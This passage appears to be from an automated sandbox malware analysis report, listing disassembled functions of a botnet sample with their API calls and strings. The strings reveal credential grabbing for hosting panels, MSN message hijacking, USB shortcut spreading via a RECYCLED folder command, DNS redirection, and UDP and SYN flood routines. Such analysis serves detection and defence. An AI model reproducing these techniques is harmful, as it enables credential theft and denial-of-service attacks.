                                                                  Download Yara Rule
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,?,003D7CC2,00000000,003E2914,?,?,?,?,?,?), ref: 003DAE11
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000001,?,003D7CC2,00000000,003E2914,?,?,?,?,?,?,?,00000000), ref: 003DAE23
                                                                  • HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,?,?,?,?,00000000), ref: 003DAE41
                                                                  • strstr.MSVCRT(?,003E19DC), ref: 003DAE59
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 003DAE70
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 003DAE77
                                                                  • lstrcatA.KERNEL32(00000000,003E2B54), ref: 003DAE7F
                                                                  • strtok.MSVCRT(00000000,003E19DC), ref: 003DAE8E
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DAEA1
                                                                  • _strnicmp.MSVCRT(00000000,00000000,00000000), ref: 003DAEA6
                                                                  • strtok.MSVCRT(00000000,003E19DC), ref: 003DAEB9
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003DAED5
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003DAEEB
                                                                  • strstr.MSVCRT(00000000,003E2B54), ref: 003DAF10
                                                                  • lstrlenA.KERNEL32(00000001), ref: 003DAF20
                                                                  • lstrlenA.KERNEL32(00000001), ref: 003DAF27
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 003DAF2B
                                                                  • lstrlenA.KERNEL32(00000001), ref: 003DAF3D
                                                                  • lstrcpyA.KERNEL32(?,00000001), ref: 003DAF58
                                                                  • lstrlenA.KERNEL32(00000001,?,00000001), ref: 003DAF5F
                                                                  • lstrlenA.KERNEL32(00000001,?,00000001), ref: 003DAF6B
                                                                  • HeapFree.KERNEL32(?,00000000,00000000,?,00000001), ref: 003DAF82
                                                                  • HeapFree.KERNEL32(?,00000000,00000000,?,00000001), ref: 003DAF91
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$Free$lstrcpy$Allocstrstrstrtok$??2@_strnicmplstrcat
                                                                  • String ID:
                                                                  • API String ID: 3119447416-0
                                                                  • Opcode ID: c36fee33b67904ccd3c1177d72155f875c26d7deb399917bae9984f70a34bac8
                                                                  • Instruction ID: 9dd0e345b1aae6ede776ff25b2fe119c2e8e090151771e71fcb0376593987c44
                                                                  • Opcode Fuzzy Hash: c36fee33b67904ccd3c1177d72155f875c26d7deb399917bae9984f70a34bac8
                                                                  • Instruction Fuzzy Hash: C941B276601364ABCB229BA5ED81FAF73ACEF45700F144119FA049B380DB74ED11C7A6
                                                                  Function 003D7C00 Relevance: 33.4, APIs: 7, Strings: 12, Instructions: 175stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • strstr.MSVCRT(00000000,003E19DC,00000000,00000000), ref: 003D7C62
                                                                  • _stricmp.MSVCRT(?,cPanel,blog,%s-%s-%s,?,?,00000000), ref: 003D7D58
                                                                  • _stricmp.MSVCRT(00000000,WHM), ref: 003D7D71
                                                                  • _stricmp.MSVCRT(?,WHCMS), ref: 003D7D8A
                                                                  • _stricmp.MSVCRT(?,Directadmin), ref: 003D7DA3
                                                                    • Part of subcall function 003DA310: memset.MSVCRT ref: 003DA335
                                                                    • Part of subcall function 003DA310: memset.MSVCRT ref: 003DA34F
                                                                    • Part of subcall function 003DA310: memset.MSVCRT(?,00000000,000003FF), ref: 003DA369
                                                                    • Part of subcall function 003DA310: _vsnprintf.MSVCRT(?,000003FE,003E0A8E,000001FE,?,00000000,000003FF), ref: 003DA382
                                                                    • Part of subcall function 003DA310: sprintf.MSVCRT(00000000,003E13EC,?,?,000003FE,003E0A8E,000001FE,?,00000000,000003FF), ref: 003DA39A
                                                                    • Part of subcall function 003DA310: lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB,%s.%s,blk,?,?,000001FE,003E0A8E), ref: 003DA3AD
                                                                    • Part of subcall function 003DA310: _snprintf.MSVCRT(?,000003FF,\\.\pipe\%08x_ipc,00000000,30e44aa1,00000000,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB,%s.%s), ref: 003DA3CC
                                                                    • Part of subcall function 003DA310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB), ref: 003DA3DB
                                                                    • Part of subcall function 003DA310: sprintf.MSVCRT(?,%d.,00000000,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB), ref: 003DA3EC
                                                                    • Part of subcall function 003DA310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 003DA3FB
                                                                    • Part of subcall function 003DA310: lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 003DA404
                                                                    • Part of subcall function 003DA310: EnterCriticalSection.KERNEL32(0041AC34,?,?,00000000), ref: 003DA436
                                                                    • Part of subcall function 003DA310: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 003DA452
                                                                    • Part of subcall function 003DA310: LeaveCriticalSection.KERNEL32(0041AC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003DA464
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 003D7E02
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 003D7E12
                                                                    • Part of subcall function 003D73E0: memset.MSVCRT(?,00000000,000001FF), ref: 003D7401
                                                                    • Part of subcall function 003D73E0: memset.MSVCRT(?,00000000,000001FF,?,00000000,000001FF), ref: 003D7419
                                                                    • Part of subcall function 003D73E0: lstrlenA.KERNEL32(?), ref: 003D7431
                                                                    • Part of subcall function 003D73E0: _snprintf.MSVCRT(?,000001FE,%s_,?), ref: 003D7449
                                                                    • Part of subcall function 003D73E0: _vsnprintf.MSVCRT(?,000001FE,003E0A8E,?), ref: 003D746B
                                                                    • Part of subcall function 003D73E0: lstrlenA.KERNEL32(?), ref: 003D747A
                                                                    • Part of subcall function 003D7330: memset.MSVCRT(?,00000000,000001FF), ref: 003D7351
                                                                    • Part of subcall function 003D7330: lstrlenA.KERNEL32(?), ref: 003D7369
                                                                    • Part of subcall function 003D7330: _snprintf.MSVCRT(00000000,000001FE,%s_,?), ref: 003D7381
                                                                    • Part of subcall function 003D7330: _vsnprintf.MSVCRT(00000000,000001FE,003E0AAD,?), ref: 003D73A3
                                                                    • Part of subcall function 003D7330: lstrlenA.KERNEL32(00000000), ref: 003D73B2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$memset$_stricmp$_snprintf_vsnprintf$??3@CriticalSectionsprintf$CreateEnterFileLeavestrstr
                                                                  • String ID: %s-%s-%s$%s.%s ->> %s (%s : %s)$%s.%s ->> %s : %s$4)>$Directadmin$WHCMS$WHM$blog$cPanel$ffgrab$httplogin$iegrab
                                                                  • API String ID: 3716863481-3181307524
                                                                  • Opcode ID: a13d14a297b4a55a1ec9ce18f659adaaf63f151f3375cffe85986f53be40baec
                                                                  • Instruction ID: f4a03d5745479a937370feb66a53a16a7a7b4e28a962c3e4337f9acab75369c1
                                                                  • Opcode Fuzzy Hash: a13d14a297b4a55a1ec9ce18f659adaaf63f151f3375cffe85986f53be40baec
                                                                  • Instruction Fuzzy Hash: 7E51EB76D04265ABDB13DB96AD82DBB736DAF50740F44061AF801973C1F670ED41CBA2
                                                                  Function 003D25D0 Relevance: 31.7, APIs: 7, Strings: 14, Instructions: 191stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • sscanf.MSVCRT(?,CAL %d %256s,?,003E7008), ref: 003D260F
                                                                    • Part of subcall function 003E07D0: lstrlenA.KERNEL32(*&=,?,?,00000000,?,003D262A,?,003E7008), ref: 003E07DC
                                                                    • Part of subcall function 003E07D0: lstrcpyA.KERNEL32(00000000,*&=,?,003E7008), ref: 003E07F9
                                                                  • strstr.MSVCRT(?,X-MMS-IM-Format:), ref: 003D264F
                                                                    • Part of subcall function 003D7700: memset.MSVCRT(?,00000000,000001FF), ref: 003D771E
                                                                    • Part of subcall function 003D7700: _snprintf.MSVCRT(00000000,000001FF,state_%s,?,?,00000000,000001FF), ref: 003D7738
                                                                    • Part of subcall function 003D7700: lstrlenA.KERNEL32(00000000), ref: 003D7747
                                                                  • atoi.MSVCRT(00000000), ref: 003D26FB
                                                                  • atoi.MSVCRT(00000000), ref: 003D2713
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003D276B
                                                                  • lstrlenA.KERNEL32(00000000,00000000), ref: 003D278C
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003D27F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$atoi$FreeHeap_snprintflstrcpymemsetsscanfstrstr
                                                                  • String ID: %s.p10-> Message hijacked!$%s.p10-> Message to %s hijacked!$%s.p21-> Message hijacked!$CAL $CAL %d %256s$MSG $MSG $SDG $X-MMS-IM-Format:$baddr$msn$msnint$msnmsg$msnu
                                                                  • API String ID: 1527159713-2027340701
                                                                  • Opcode ID: 5d97c240b15b5f7f0e352998f92e10198408d1865a6850ec7d6b299207b56944
                                                                  • Instruction ID: 52a1370054c9857e5899398052c7c403657da723e04da68524eb1ad7a1963f7e
                                                                  • Opcode Fuzzy Hash: 5d97c240b15b5f7f0e352998f92e10198408d1865a6850ec7d6b299207b56944
                                                                  • Instruction Fuzzy Hash: DA515B77E0439067CB336BA67CC2EEF7368DB61310F50466BF804A63C2E6B599508693
                                                                  Function 003DEFE0 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 106stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(?), ref: 003DEFF4
                                                                  • memset.MSVCRT ref: 003DF011
                                                                  • memset.MSVCRT(?,00000000,000007FF), ref: 003DF02B
                                                                  • PathFindExtensionA.SHLWAPI(?,.lnk), ref: 003DF039
                                                                  • lstrcmpA.KERNEL32(00000000), ref: 003DF046
                                                                  • lstrcmpA.KERNEL32(?,003E13D8), ref: 003DF056
                                                                  • lstrcmpA.KERNEL32(?,003E2FCC), ref: 003DF066
                                                                  • lstrcmpA.KERNEL32(?,RECYCLED), ref: 003DF08F
                                                                  • strrchr.MSVCRT(?,0000005C), ref: 003DF09C
                                                                  • strrchr.MSVCRT(?,0000005C,?,0000005C), ref: 003DF0A9
                                                                  • _snprintf.MSVCRT(?,000007FF,/c "start %%cd%%RECYCLED\%s,00000001), ref: 003DF0CC
                                                                  • _snprintf.MSVCRT(?,000007FF,&&%%windir%%\explorer.exe %%cd%%%s,00000001,?,000007FF,/c "start %%cd%%RECYCLED\%s,00000001), ref: 003DF0E4
                                                                  • SetFileAttributesA.KERNEL32(?,00000006), ref: 003DF109
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmp$AttributesFile_snprintfmemsetstrrchr$ExtensionFindPath
                                                                  • String ID: %windir%\system32\cmd.exe$&&%%windir%%\explorer.exe %%cd%%%s$.lnk$/c "start %%cd%%RECYCLED\%s$RECYCLED
                                                                  • API String ID: 1691573101-2902080580
                                                                  • Opcode ID: 9386da8ab0e8297f1abfbff3a10014aaa50d97d438672f82a70ab2e770da5402
                                                                  • Instruction ID: 4bd90dbf50c321e74519aea3d07b2a31a8f67e947d027c78095aa0b2b9f0ffd6
                                                                  • Opcode Fuzzy Hash: 9386da8ab0e8297f1abfbff3a10014aaa50d97d438672f82a70ab2e770da5402
                                                                  • Instruction Fuzzy Hash: 7C31F8736403A56AD723B665EC42FEB336CEF88741F040275FA0DA51C1DBB499458AB1
                                                                  Function 003DE590 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 141stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003DE5B0
                                                                  • EnterCriticalSection.KERNEL32(0041B3C8), ref: 003DE5C9
                                                                  • strtok.MSVCRT(?,003E2B84), ref: 003DE5FE
                                                                  • strstr.MSVCRT(00000000,003E13D8), ref: 003DE617
                                                                  • strstr.MSVCRT(00000000,003E2C78), ref: 003DE62D
                                                                  • strstr.MSVCRT(00000000,003E13D8), ref: 003DE642
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DE655
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DE65B
                                                                  • lstrcpyA.KERNEL32(00000000,003E1335), ref: 003DE678
                                                                  • lstrcpynA.KERNEL32(00000000,00000000,00000000), ref: 003DE687
                                                                    • Part of subcall function 003D7500: lstrlenA.KERNEL32(?), ref: 003D752B
                                                                    • Part of subcall function 003D7500: _snprintf.MSVCRT(?,000001FF,%s_,?), ref: 003D7547
                                                                    • Part of subcall function 003D7500: _vsnprintf.MSVCRT(?,000001FF,00000000,?), ref: 003D7569
                                                                    • Part of subcall function 003D7500: lstrcmpA.KERNEL32(?,bdns), ref: 003D758B
                                                                    • Part of subcall function 003D7500: StrStrIA.SHLWAPI(?,00000000), ref: 003D759F
                                                                    • Part of subcall function 003D7500: lstrlenA.KERNEL32(?), ref: 003D75B9
                                                                  • strtok.MSVCRT(00000000,003E2B84), ref: 003DE6CF
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003DE71E
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 003DE72D
                                                                  • LeaveCriticalSection.KERNEL32(0041B3C8), ref: 003DE73A
                                                                    • Part of subcall function 003DAA10: memset.MSVCRT(?,00000000,00000103), ref: 003DAA31
                                                                    • Part of subcall function 003DAA10: lstrcpyA.KERNEL32(00000000,Mozilla/4.0), ref: 003DAA45
                                                                    • Part of subcall function 003DAA10: InternetOpenA.WININET(00000000,?,?,?,?), ref: 003DAA60
                                                                    • Part of subcall function 003DAA10: lstrlenA.KERNEL32(?), ref: 003DAA78
                                                                    • Part of subcall function 003DAA10: InternetOpenUrlA.WININET(?,?,?,00000000,04000000,00000000), ref: 003DAA8C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$strstr$CriticalInternetOpenSectionlstrcpymemsetstrtok$??3@EnterFreeHeapLeave_snprintf_vsnprintflstrcmplstrcpyn
                                                                  • String ID: [DNS]: Blocked %d domain(s) - Redirected %d domain(s)$bdns$block
                                                                  • API String ID: 1940452476-536441337
                                                                  • Opcode ID: b03e4564b27957440a23433b9a5810ff8857fd0800ef8b604f262e5b2515a938
                                                                  • Instruction ID: 6348a63dd90e52ecb5363f48e68823f91cd7050f5e7251bb03177809b142191f
                                                                  • Opcode Fuzzy Hash: b03e4564b27957440a23433b9a5810ff8857fd0800ef8b604f262e5b2515a938
                                                                  • Instruction Fuzzy Hash: D2411B76D003687BC723A7A5AC82DFF7B7CDB90700F140256F905AA281E6B09E4086A1
                                                                  Function 003D1290 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 146threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 003D12BE
                                                                  • wcsstr.MSVCRT(?,003E1378), ref: 003D12FD
                                                                  • wcsstr.MSVCRT(?,\\.\pipe), ref: 003D1313
                                                                  • wcsstr.MSVCRT(?,DBWIN), ref: 003D1325
                                                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 003D1368
                                                                  • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 003D1373
                                                                  • ExitThread.KERNEL32 ref: 003D1416
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Filewcsstr$Attributes$ExitMoveThread
                                                                  • String ID: %s.%S$DBWIN$\\.\pipe$brk$dll$exe$ruskill
                                                                  • API String ID: 294512176-1976196219
                                                                  • Opcode ID: ccd532b7e903d9985cda4314a222243ea7bd3489420203ad3157ecad1ca8e662
                                                                  • Instruction ID: 37c829ea428e5220feaddb97e5d2eb9938f591637ea7ac3bd8e603ee44bce6ae
                                                                  • Opcode Fuzzy Hash: ccd532b7e903d9985cda4314a222243ea7bd3489420203ad3157ecad1ca8e662
                                                                  • Instruction Fuzzy Hash: 7841FF7A600255BBDB239F52BC86FDF336CEB58351F05022AF904963C0EB70AD4086A2
                                                                  Function 003DB300 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 129stringmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,00000208), ref: 003DB312
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 003DB319
                                                                  • memset.MSVCRT(?,00000000,00000206), ref: 003DB339
                                                                  • memset.MSVCRT(?,00000000,00000206,?,00000000,00000206), ref: 003DB354
                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 003DB387
                                                                  • lstrcpynW.KERNEL32(?,?,00000004), ref: 003DB3A1
                                                                  • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 003DB3BB
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 003DB3D8
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 003DB3F0
                                                                  • lstrcatW.KERNEL32(00000000,.exe), ref: 003DB461
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Heaplstrlenmemset$AllocDirectoryInformationProcessVolumeWindowslstrcatlstrcpyn
                                                                  • String ID: .exe$30e44aa1$lol$lol.exe
                                                                  • API String ID: 1748614950-52295467
                                                                  • Opcode ID: 129d5ab4e021da50ecc962b97d80529d177d10a18fbddd3d37e5878c9279055d
                                                                  • Instruction ID: d2c403bfb5887a3dc3afc68f331ec836dcbe6c9f2a87c841abfaac419e325696
                                                                  • Opcode Fuzzy Hash: 129d5ab4e021da50ecc962b97d80529d177d10a18fbddd3d37e5878c9279055d
                                                                  • Instruction Fuzzy Hash: 7B415BB1601364E6C721CB66DC45AEFFBBDEF84311F0082A6F518D6291E7B88E40D7A5
                                                                  Function 003DAA10 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 157networkstringfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003DAA31
                                                                  • lstrcpyA.KERNEL32(00000000,Mozilla/4.0), ref: 003DAA45
                                                                  • InternetOpenA.WININET(00000000,?,?,?,?), ref: 003DAA60
                                                                  • lstrlenA.KERNEL32(?), ref: 003DAA78
                                                                  • InternetOpenUrlA.WININET(?,?,?,00000000,04000000,00000000), ref: 003DAA8C
                                                                  • HttpQueryInfoA.WININET(?,20000013,?,?,00000000), ref: 003DAAC0
                                                                  • InternetQueryDataAvailable.WININET(00000000,?,00000000,00000000), ref: 003DAAE2
                                                                  • ??2@YAPAXI@Z.MSVCRT(00001000), ref: 003DAB15
                                                                  • InternetReadFile.WININET(00000000,?,00000FF8,00000001), ref: 003DAB67
                                                                  • ??2@YAPAXI@Z.MSVCRT(?), ref: 003DAB85
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 003DABA5
                                                                  • InternetCloseHandle.WININET(00000000), ref: 003DABE7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$??2@OpenQuery$??3@AvailableCloseDataFileHandleHttpInfoReadlstrcpylstrlenmemset
                                                                  • String ID: Mozilla/4.0
                                                                  • API String ID: 2392773942-2634101963
                                                                  • Opcode ID: 2ed69a3993d2c152394e42fa77ab4c94001d30c3665b2c2998835b9ce7c447a5
                                                                  • Instruction ID: 05a42c4d6388cb9cf98d000b8daeae0dee4b3463d7a332369121fb76ec500742
                                                                  • Opcode Fuzzy Hash: 2ed69a3993d2c152394e42fa77ab4c94001d30c3665b2c2998835b9ce7c447a5
                                                                  • Instruction Fuzzy Hash: AB518A71A00245ABD722DF59ED84BEA77ECEB88700F04867EE908DB290D7709945CF95
                                                                  Function 003DEE40 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142stringcomCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(003E3634,00000000,00000001,003E3614,?), ref: 003DEE5B
                                                                  • memset.MSVCRT(?,00000000,00000207), ref: 003DEE81
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 003DEE9A
                                                                  • lstrcatA.KERNEL32(00000000,003E2C78), ref: 003DEEAE
                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 003DEEBB
                                                                  • memset.MSVCRT(?,00000000,0000015C), ref: 003DEED5
                                                                  • SHGetFileInfoA.SHELL32(?,00000000,00000000,00000160,00001000), ref: 003DEEF4
                                                                  • memset.MSVCRT(?,00000000,00000107), ref: 003DEF68
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 003DEF7B
                                                                  • lstrcatA.KERNEL32(00000000,.lnk), ref: 003DEF89
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 003DEFA4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcatmemset$lstrcpy$ByteCharCreateFileInfoInstanceMultiWide
                                                                  • String ID: .lnk$shell32.dll
                                                                  • API String ID: 3196525290-3399515747
                                                                  • Opcode ID: 7a6449aa8b09d6bd2bf3cec2d0f4304fedd0933a898fe0be89b673b6a8d21f5d
                                                                  • Instruction ID: 5463c1652e749f277797f16eb2b89de6a52ada2ce9d29776e872d601c4e77962
                                                                  • Opcode Fuzzy Hash: 7a6449aa8b09d6bd2bf3cec2d0f4304fedd0933a898fe0be89b673b6a8d21f5d
                                                                  • Instruction Fuzzy Hash: 63514075A00258AFDB55DB94CC85FDAB3BCAF8C700F104698F608EB2D0D6B0AE45CB64
                                                                  Function 003D2220 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 132networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000003FF), ref: 003D2243
                                                                  • WSAStartup.WS2_32(00000202,?), ref: 003D2257
                                                                    • Part of subcall function 003D9300: inet_addr.WS2_32(n"=), ref: 003D9308
                                                                    • Part of subcall function 003D9300: gethostbyname.WS2_32(n"=), ref: 003D9313
                                                                  • htons.WS2_32(00000050), ref: 003D2288
                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 003D2297
                                                                  • connect.WS2_32(00000000,?,00000010), ref: 003D22AE
                                                                  • GetTickCount.KERNEL32 ref: 003D22C3
                                                                  • GetTickCount.KERNEL32 ref: 003D22F4
                                                                  • GetTickCount.KERNEL32 ref: 003D2307
                                                                  • send.WS2_32(00000000,00000000,00000400,00000000), ref: 003D2344
                                                                  • GetTickCount.KERNEL32 ref: 003D2350
                                                                  • closesocket.WS2_32(00000000), ref: 003D2363
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$Startupclosesocketconnectgethostbynamehtonsinet_addrmemsetsendsocket
                                                                  • String ID: gfff$i.root-servers.org
                                                                  • API String ID: 99835129-3534201491
                                                                  • Opcode ID: e1487b2a81e42798eea6ce5c2a78ab008f2a6f44adf2ce762e4aa053aa18dad8
                                                                  • Instruction ID: 5f7dfedf731dc991d9b78886d0a81204c78373367e112818497849a9339cfeae
                                                                  • Opcode Fuzzy Hash: e1487b2a81e42798eea6ce5c2a78ab008f2a6f44adf2ce762e4aa053aa18dad8
                                                                  • Instruction Fuzzy Hash: 88314EB3B0021857DB1AD66DAC427BFB2698F94710F444676FA0CEB3C0E9B49D4147D6
                                                                  Function 003D9830 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 123memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000003FF), ref: 003D9850
                                                                  • strtok.MSVCRT(?,003E29EC), ref: 003D986E
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003D988B
                                                                  • lstrcpynA.KERNEL32(00000000,00000000,00000400), ref: 003D98A8
                                                                  • strtok.MSVCRT(00000000,003E29EC), ref: 003D98B5
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003D98D1
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003D999C
                                                                  Strings
                                                                  • [UDP]: Finished flood on "%s:%d", xrefs: 003D9970
                                                                  • [UDP]: Starting flood on "%s:%d" for %d second(s), xrefs: 003D993A
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap$strtok$lstrcpynmemset
                                                                  • String ID: [UDP]: Finished flood on "%s:%d"$[UDP]: Starting flood on "%s:%d" for %d second(s)
                                                                  • API String ID: 216847750-2644890838
                                                                  • Opcode ID: 5e17c38109a90a1f93c0ac666748f1b4b176a2d0b6450c772f9fec0c7271ad70
                                                                  • Instruction ID: ed51031e9849e3ccac9d697ed01251682ca186f06f811a69abf6e79bb38495a0
                                                                  • Opcode Fuzzy Hash: 5e17c38109a90a1f93c0ac666748f1b4b176a2d0b6450c772f9fec0c7271ad70
                                                                  • Instruction Fuzzy Hash: 6731ECF35402986BD722A7A1BC86FAB336CEB84705F04426EFF089A2C1D6719D148766
                                                                  Function 003D96B0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 123memorystringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000003FF), ref: 003D96D0
                                                                  • strtok.MSVCRT(?,003E29EC), ref: 003D96EE
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003D970B
                                                                  • lstrcpynA.KERNEL32(00000000,00000000,00000400), ref: 003D9728
                                                                  • strtok.MSVCRT(00000000,003E29EC), ref: 003D9735
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003D9751
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003D981C
                                                                  Strings
                                                                  • [SYN]: Starting flood on "%s:%d" for %d second(s), xrefs: 003D97BA
                                                                  • [SYN]: Finished flood on "%s:%d", xrefs: 003D97F0
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: FreeHeap$strtok$lstrcpynmemset
                                                                  • String ID: [SYN]: Finished flood on "%s:%d"$[SYN]: Starting flood on "%s:%d" for %d second(s)
                                                                  • API String ID: 216847750-3475151101
                                                                  • Opcode ID: 64d7b8244fbfdc1afa4d47cb7060f5ba771a40b01b51bcfd978bc403f22fd462
